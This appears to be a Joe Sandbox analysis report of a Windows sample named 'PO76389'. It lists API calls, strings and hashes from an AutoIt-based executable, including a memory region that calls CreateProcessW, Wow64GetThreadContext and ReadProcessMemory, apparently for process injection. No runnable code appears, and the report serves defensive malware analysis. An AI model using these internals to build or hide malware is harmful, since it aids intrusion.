                                                    • Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                    • Instruction ID: 2283dd478d41de034eb055ff4b8fe536113dcec5001026e7e39ed7df0db28621
                                                    • Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                    • Instruction Fuzzy Hash: FAA12578E40209EBDB14CFA4C988BEEBBB5FF49314F248159E101BB280D7759A81CF64

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1368 4ceb05-4ceb2f call 4bc4cd RegOpenKeyExW 1371 524b17-524b2e RegQueryValueExW 1368->1371 1372 4ceb35-4ceb39 1368->1372 1373 524b30-524b6d call 4d010a call 4b4bce RegQueryValueExW 1371->1373 1374 524b91-524b9a RegCloseKey 1371->1374 1379 524b88-524b90 call 4b4fd2 1373->1379 1380 524b6f-524b86 call 4b7e53 1373->1380 1379->1374 1380->1379
                                                    APIs
                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,004CEADA,?,?), ref: 004CEB27
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,004CEADA,?,?), ref: 00524B26
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,004CEADA,?,?), ref: 00524B65
                                                    • RegCloseKey.ADVAPI32(?,?,004CEADA,?,?), ref: 00524B94
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: QueryValue$CloseOpen
                                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                                    • API String ID: 1586453840-614718249
                                                    • Opcode ID: 803aed0ddcf822889da7b60ad32da45f92e22f792fe535321295db6d8679d21a
                                                    • Instruction ID: 8b9ab2b3bd5058fdcdece07f59c9dea5b49bbf76514ea8e88d0d86418c00e9fb
                                                    • Opcode Fuzzy Hash: 803aed0ddcf822889da7b60ad32da45f92e22f792fe535321295db6d8679d21a
                                                    • Instruction Fuzzy Hash: 85114C71600118BEEB04DBA4DD8AEFE7BBCEF04758F10005AF506E6191EA70AE05EB64

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1395 4b2e9d-4b2f0d CreateWindowExW * 2 ShowWindow * 2
                                                    APIs
                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004B2ECB
                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004B2EEC
                                                    • ShowWindow.USER32(00000000), ref: 004B2F00
                                                    • ShowWindow.USER32(00000000), ref: 004B2F09
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateShow
                                                    • String ID: AutoIt v3$edit
                                                    • API String ID: 1584632944-3779509399
                                                    • Opcode ID: 690b7cd8561ebf0db84caecbba5776065c0dec21c8e5abf1711fbddf4147d1f3
                                                    • Instruction ID: 65594ccbcf78364c212333c8bd16966341ffd63cb05eddffef7f75abd1f56908
                                                    • Opcode Fuzzy Hash: 690b7cd8561ebf0db84caecbba5776065c0dec21c8e5abf1711fbddf4147d1f3
                                                    • Instruction Fuzzy Hash: 0CF030715406D07BD730676B7C0DE672E7DE7D6F10B01401EBA0892260C16108DDFA78
                                                    APIs
                                                      • Part of subcall function 00DA1638: Sleep.KERNEL32(000001F4), ref: 00DA1649
                                                    • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00DA18C5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096915839.0000000000D9F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D9F000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d9f000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CreateFileSleep
                                                    • String ID: JQ5R94PILMVURJ4M0HA5S
                                                    • API String ID: 2694422964-3514039230
                                                    • Opcode ID: 380704c52e1721c1b7d4378b22b8126d48c71959318d967801cadf354f0a83d4
                                                    • Instruction ID: f859a1f25feadd0590f73a4490bd7c6cced62b6c1c1f3da77e2ccb6f6813e6a4
                                                    • Opcode Fuzzy Hash: 380704c52e1721c1b7d4378b22b8126d48c71959318d967801cadf354f0a83d4
                                                    • Instruction Fuzzy Hash: 09619F34E0424CDAEF11DBA4D8547EFBB79EF59300F044199E208BB2C1D6BA5A45CBB6
                                                    APIs
                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0052454E
                                                      • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                    • _memset.LIBCMT ref: 004B3965
                                                    • _wcscpy.LIBCMT ref: 004B39B5
                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 004B39C6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                    • String ID: Line:
                                                    • API String ID: 3942752672-1585850449
                                                    • Opcode ID: 4682a574edca34c7c1ef5e48683160fb1660a44ef71001ff3a45fdfb06fea1ef
                                                    • Instruction ID: 3ae5d0a30d949020e42968ce22a0d4b12ca8ca4d54144ec5da6853e11dadd9f3
                                                    • Opcode Fuzzy Hash: 4682a574edca34c7c1ef5e48683160fb1660a44ef71001ff3a45fdfb06fea1ef
                                                    • Instruction Fuzzy Hash: 1231D5B1108340ABD721EF55DC45FDB7BE8AF54315F00451FF189821A1DB78AA8CEBAA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: dEV
                                                    • API String ID: 0-3214538095
                                                    • Opcode ID: b371fdfe2bcbd0a09fe8839890b3e70a550311d610017f2ab26b8fe21406d15c
                                                    • Instruction ID: 5ebbed624243d763ebd0dc42492f266a65792927744d822573edd6655716f44f
                                                    • Opcode Fuzzy Hash: b371fdfe2bcbd0a09fe8839890b3e70a550311d610017f2ab26b8fe21406d15c
                                                    • Instruction Fuzzy Hash: B1F17A716083019FD720DF24C985B5EBBE5FF88314F14892EF9998B292D774E945CB82
                                                    APIs
                                                    • SHGetMalloc.SHELL32(1<K), ref: 004B3A7D
                                                    • SHGetPathFromIDListW.SHELL32(?,?), ref: 004B3AD2
                                                    • SHGetDesktopFolder.SHELL32(?), ref: 004B3A8F
                                                      • Part of subcall function 004B3B1E: _wcsncpy.LIBCMT ref: 004B3B32
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                    • String ID: 1<K
                                                    • API String ID: 3981382179-1209382738
                                                    • Opcode ID: 23ca5b2428c4a13f6c40432c37653c37463e81409bf642f5d34f830c9e76d3ce
                                                    • Instruction ID: 5f8de176e659bb12bbc1c2185ec26dc1cc51a1932b5c9bf298b0dea110f5039b
                                                    • Opcode Fuzzy Hash: 23ca5b2428c4a13f6c40432c37653c37463e81409bf642f5d34f830c9e76d3ce
                                                    • Instruction Fuzzy Hash: FA21AF32B00114ABCB10DF96DC84DEEBBBDEF88701B104099F509DB245DB70AE46CBA4
                                                    APIs
                                                    • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004CC948,SwapMouseButtons,00000004,?), ref: 004CC979
                                                    • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004CC948,SwapMouseButtons,00000004,?,?,?,?,004CBF22), ref: 004CC99A
                                                    • RegCloseKey.KERNEL32(00000000,?,?,004CC948,SwapMouseButtons,00000004,?,?,?,?,004CBF22), ref: 004CC9BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: Control Panel\Mouse
                                                    • API String ID: 3677997916-824357125
                                                    • Opcode ID: 6bfff319a6176129b6c33ce23709c825cd6a54dc57dea133cb3c740e17c445d5
                                                    • Instruction ID: e7bea402613a1a70af3018bb16fa1e1442938389c9841114ee7ef32e9254c565
                                                    • Opcode Fuzzy Hash: 6bfff319a6176129b6c33ce23709c825cd6a54dc57dea133cb3c740e17c445d5
                                                    • Instruction Fuzzy Hash: 29117CB9511208BFDB608F64DC84EAF7BB8EF14740F00441AE849E7210E231AE55AB64
                                                    APIs
                                                    • CreateProcessW.KERNEL32(?,00000000), ref: 00DA0DF3
                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00DA0E89
                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00DA0EAB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096915839.0000000000D9F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D9F000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d9f000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                    • String ID:
                                                    • API String ID: 2438371351-0
                                                    • Opcode ID: 9ff7d806dc6ef1cc8f26af8a7a5011723b62bd23310367b846ce676590f9e849
                                                    • Instruction ID: 0c443f241f25992a0847ce1934e2048bb71c6ab524acb73f0883da0f7e819a74
                                                    • Opcode Fuzzy Hash: 9ff7d806dc6ef1cc8f26af8a7a5011723b62bd23310367b846ce676590f9e849
                                                    • Instruction Fuzzy Hash: 0C620D34A14258DBEB24CFA4C841BDEB776EF59300F1091A9D10DEB390E7799E81CB69
                                                    APIs
                                                      • Part of subcall function 004B16F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 004B1751
                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 004B159B
                                                    • CoInitialize.OLE32(00000000), ref: 004B1612
                                                    • CloseHandle.KERNEL32(00000000), ref: 005258F7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                                    • String ID: '/O
                                                    • API String ID: 458326420-909962523
                                                    • Opcode ID: f36ba485cb443adbf64a77eb81d391ec0c146e8d4598be742c61081605a7591f
                                                    • Instruction ID: 4171bfb248d227c5a931d4a50c54fa6632f26a655904c68062bbefce34b9e5a8
                                                    • Opcode Fuzzy Hash: f36ba485cb443adbf64a77eb81d391ec0c146e8d4598be742c61081605a7591f
                                                    • Instruction Fuzzy Hash: 2071EDB4811A408BCB18DF6EB996494BBEAF768348794416ED40E87362DB74448CFF2D
                                                    APIs
                                                      • Part of subcall function 004B41A7: _fseek.LIBCMT ref: 004B41BF
                                                      • Part of subcall function 004FCE59: _wcscmp.LIBCMT ref: 004FCF49
                                                      • Part of subcall function 004FCE59: _wcscmp.LIBCMT ref: 004FCF5C
                                                    • _free.LIBCMT ref: 004FCDC9
                                                    • _free.LIBCMT ref: 004FCDD0
                                                    • _free.LIBCMT ref: 004FCE3B
                                                      • Part of subcall function 004D28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,004D8715,00000000,004D88A3,004D4673,?), ref: 004D28DE
                                                      • Part of subcall function 004D28CA: GetLastError.KERNEL32(00000000,?,004D8715,00000000,004D88A3,004D4673,?), ref: 004D28F0
                                                    • _free.LIBCMT ref: 004FCE43
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                    • String ID:
                                                    • API String ID: 1552873950-0
                                                    • Opcode ID: 1b9f66a9c7b7a9afb7d0c2b4554c8842c012ae3f41f6b91280fc812f9d2c869d
                                                    • Instruction ID: 971ae27551b3dfc7e4a5d2498cc81af2b207a50636aeafa6adef215754b6725b
                                                    • Opcode Fuzzy Hash: 1b9f66a9c7b7a9afb7d0c2b4554c8842c012ae3f41f6b91280fc812f9d2c869d
                                                    • Instruction Fuzzy Hash: EF514CB1D0421CAFDF149F69CC81AAEBBB9EF48304F1044AFF619A3251D7755A808F69
                                                    APIs
                                                      • Part of subcall function 004D45EC: __FF_MSGBANNER.LIBCMT ref: 004D4603
                                                      • Part of subcall function 004D45EC: __NMSG_WRITE.LIBCMT ref: 004D460A
                                                      • Part of subcall function 004D45EC: RtlAllocateHeap.NTDLL(00D50000,00000000,00000001), ref: 004D462F
                                                    • std::exception::exception.LIBCMT ref: 004D013E
                                                    • __CxxThrowException@8.LIBCMT ref: 004D0153
                                                      • Part of subcall function 004D7495: RaiseException.KERNEL32(?,?,004B125D,00566598,?,?,?,004D0158,004B125D,00566598,?,00000001), ref: 004D74E6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                    • String ID: bad allocation
                                                    • API String ID: 3902256705-2104205924
                                                    • Opcode ID: a56166da06f3bba1de817ea16f72c657e95b373b80cb2605d685b25db52a0e7c
                                                    • Instruction ID: e24d9b2e1f6263688cd7bfb0a4c5a3ed1e0e8e229980248f8df6e50d5494373a
                                                    • Opcode Fuzzy Hash: a56166da06f3bba1de817ea16f72c657e95b373b80cb2605d685b25db52a0e7c
                                                    • Instruction Fuzzy Hash: EFF0C83510420EA6C715ABA9ED22ADE7BFCBF05354F10041FF905D3382DBB98690D6AD
                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 004FD01E
                                                    • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 004FD035
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Temp$FileNamePath
                                                    • String ID: aut
                                                    • API String ID: 3285503233-3010740371
                                                    • Opcode ID: 628458f46d8ffa843fd80e5e8ed18478cafafd66dc31bb6f704eb436f0213961
                                                    • Instruction ID: a5937b0d2cf980286190af3cd2a976813c0ae094a7dcfbf645b3c2d608af986c
                                                    • Opcode Fuzzy Hash: 628458f46d8ffa843fd80e5e8ed18478cafafd66dc31bb6f704eb436f0213961
                                                    • Instruction Fuzzy Hash: 2ED05EB554030EBBDB10ABA0ED0EF9A7B7CA710704F1041907A14D10D1D2B0D6598BA0
                                                    APIs
                                                    • _memset.LIBCMT ref: 004B35BE
                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 004B3667
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell__memset
                                                    • String ID:
                                                    • API String ID: 928536360-0
                                                    • Opcode ID: 1d175951a2cea089b5a81e05868b259a7a50b0ba33559e658ea6346ab081d62b
                                                    • Instruction ID: db3adaf824b96546a6ce7ff07a69334184c91b60a0e311aa1a0b14e55bb77e53
                                                    • Opcode Fuzzy Hash: 1d175951a2cea089b5a81e05868b259a7a50b0ba33559e658ea6346ab081d62b
                                                    • Instruction Fuzzy Hash: 403180B05047009FC721DF29E8456D7BBE4FB59309F00092FF69E86340E775AA88DB6A
                                                    APIs
                                                    • __FF_MSGBANNER.LIBCMT ref: 004D4603
                                                      • Part of subcall function 004D8E52: __NMSG_WRITE.LIBCMT ref: 004D8E79
                                                      • Part of subcall function 004D8E52: __NMSG_WRITE.LIBCMT ref: 004D8E83
                                                    • __NMSG_WRITE.LIBCMT ref: 004D460A
                                                      • Part of subcall function 004D8EB2: GetModuleFileNameW.KERNEL32(00000000,00570312,00000104,?,00000001,004D0127), ref: 004D8F44
                                                      • Part of subcall function 004D8EB2: ___crtMessageBoxW.LIBCMT ref: 004D8FF2
                                                      • Part of subcall function 004D1D65: ___crtCorExitProcess.LIBCMT ref: 004D1D6B
                                                      • Part of subcall function 004D1D65: ExitProcess.KERNEL32 ref: 004D1D74
                                                      • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                    • RtlAllocateHeap.NTDLL(00D50000,00000000,00000001), ref: 004D462F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 1372826849-0
                                                    • Opcode ID: cac3d884f0db0bd9fb4d2821f95877a90ace383c2de56cdaaa761cf3a5c2f032
                                                    • Instruction ID: d745a5dc002420c60ff91655b854b5b3a8d8da1a8f5f566eab20e5d9f9c691f5
                                                    • Opcode Fuzzy Hash: cac3d884f0db0bd9fb4d2821f95877a90ace383c2de56cdaaa761cf3a5c2f032
                                                    • Instruction Fuzzy Hash: 5001A131601201ABE6213B25AC71A2A7358ABD3B65F11002FF606973C1DEBCDC40966D
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,004FCC71,?,?,?,?,?,00000004), ref: 004FCFE1
                                                    • SetFileTime.KERNEL32(00000000,?,00000000,?,?,004FCC71,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004FCFF7
                                                    • CloseHandle.KERNEL32(00000000,?,004FCC71,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004FCFFE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
